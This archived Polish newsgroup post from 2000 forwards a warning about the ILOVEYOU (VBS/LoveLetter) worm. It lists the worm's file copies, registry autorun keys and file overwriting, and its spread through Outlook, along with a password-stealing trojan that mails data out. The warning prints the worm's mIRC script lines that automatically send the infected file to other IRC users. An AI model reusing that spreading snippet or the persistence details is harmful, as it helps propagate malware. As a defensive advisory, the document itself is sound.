Autor: josh (pljosh_at_yahoo.com)
Data: Sun 07 May 2000 - 03:45:47 MET DST
Użytkownik Piteq <Piteq_at_pro.onet.pl> w wiadomości do grup dyskusyjnych
napisał:uc_Q4.29880$O4.629239_at_news.tpnet.pl...
> Wszyscy gadają o tym robalu na prawo i lewo ale same ogólniki, a ja tak z
> prostej ciekawości chciałbym się dowiedzieć co jest tym pieprzonym
> załącznikiem - czyżby znowu plik Worda?
> Piteq
>
>
przedstawiam forward listu:
-- -josh pljosh_at_yahoo.com >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Prosze sie strzec tego wirusa : Nazwa wirusa: VBS/LoveLetter.worm Charakterystyka: Wirus (robak) o nazwie "I love you" jest programem napisanym w VBS (Visual Basic Script)załączonym do e_maila o temacie ILOVEYOU. Wiadomość zawiera tekst "kindly check the attached LOVELETTER coming from me". Nazwa pliku załącznika to LOVE-LETTER-FOR-YOU.TXT.vbs. Jeżeli użytkownik otworzy załącznik, program VBS uruchomi się przy użyciu Windows Scripting Host. Ten ostatni normalnie nie jest zainstalowany w systemie Windows 95 ani Windows NT, chyba że zainstalowano Internet Explorer'a 5. Przy pierwszym uruchomieniu wirus kopiuje sam siebie do następujących plików: . C:\WINDOWS\SYSTEM\MSKERNEL32.VBS . C:\WINDOWS\WIN32DLL.VBS . C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS Dodaje również następujące wpisy do rejestru: .. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs .. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ Win32DLL=C:\WINDOWS\Win32DLL.vbs w celu uruchomienia wirusa przy starcie systemu. Robak zamienia również następujące pliki: . *.JPG . *.JPEG . *.MP3 . *.MP2 dodając do nich swój kod i dorzucając .VBS na końcu nazwy pliku. Tak więc np. plik PICT.JPG zmieni nazwę na PICT.JPG.VBS i bedzie zawierał wirusa.Wirus kasuje także zawartość następujących plików: . *.VBS . *.VBE . *.JS . *.JSE . *.CSS . *.WSH . *.SCT . *.HTA zapisując w nich swój własny kod i zmieniając rozszerzenie na *.VBS. Ponadto tworzy on plik o nazwie LOVE-LETTER-FOR-YOU.HTM, który zawiera kod wirusa i wysyła go na kanały IRC'a (przez DCC send) przy użyciu programu mIRC (o ile jest zainstalowany na komputerze). Dokonuje tego modyfikując skrypt mIRC'a SCRIPT.INI na następujący: [script] n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM n3=} Po krótkim czasie robak wykorzystuje z kolei program Microsoft Outlook do wysyłania e_maili do wszystkich adresatów, których wpisy znajdują się w książce adresowej. Oczywiście wszystkie wiadomości zawierają ten sam kod wirusa w załączniku i mają identyczną treść. Dodatkowo program próbuje ściągnąć z Internetu i zainstalować program WIN-BUGSFIX.EXE. Ten plik wykonywalny jest koniem trojańskim, który przechwytuje hasła i wysyła je pod adres MAILME_at_SUPER.NET.PH. Żeby ułatwić załadowanie w/w pliku, wirus ustawia w Internet Explorerze jako domyślną stronę, z której można pobrać trojana. Oto przykładowy e_mail wysyłany przez program: From: goat1_at_192.168.0.2To: mailme_at_super.net.phSubject: Barok... email.passwords.sender.trojanX-Mailer: Barok... email.passwords.sender.trojan---by: spyderHost: goat1Username: Goat1IP Address: 192.168.0.2 RAS Passwords:... <password information goes here> ... Cache Passwords:... <password information goes here> ... goatserver.goatnet/goatserver.goatnet : GOATNET\goat1: MAPI : MAPI Koń trojański przechwytujący hasła instaluje się poprzez następujący wpis do rejestru Windows: .. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX w celu uruchomienia się przy następnym starcie systemu. Po pierwszym uruchomieniu, trojan kopiuje sam siebie do pliku WinFAT32.EXE w katalogu WINDOWS\SYSTEM\, zmieniając przy tym kolejny klucz w rejestrze: .. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=Wi nFAT32.EXE Wirus został wykryty 4 maja 200 r. Ryzyko zarażenia się nim jest oceniane jako wysokie. Bez wirusowej soboty i niedzieli . Andrzej Czarnecki POLORBITAL tel/fax: 061/866-24-30 tel.kom.0501-297-255 e-mail: office_at_polorbital.net.pl lub handel_at_polorbital.net.pl http://polorbital.net.pl POZNAN POLSKA
To archiwum zostało wygenerowane przez hypermail 2.1.7 : Tue 18 May 2004 - 20:06:27 MET DST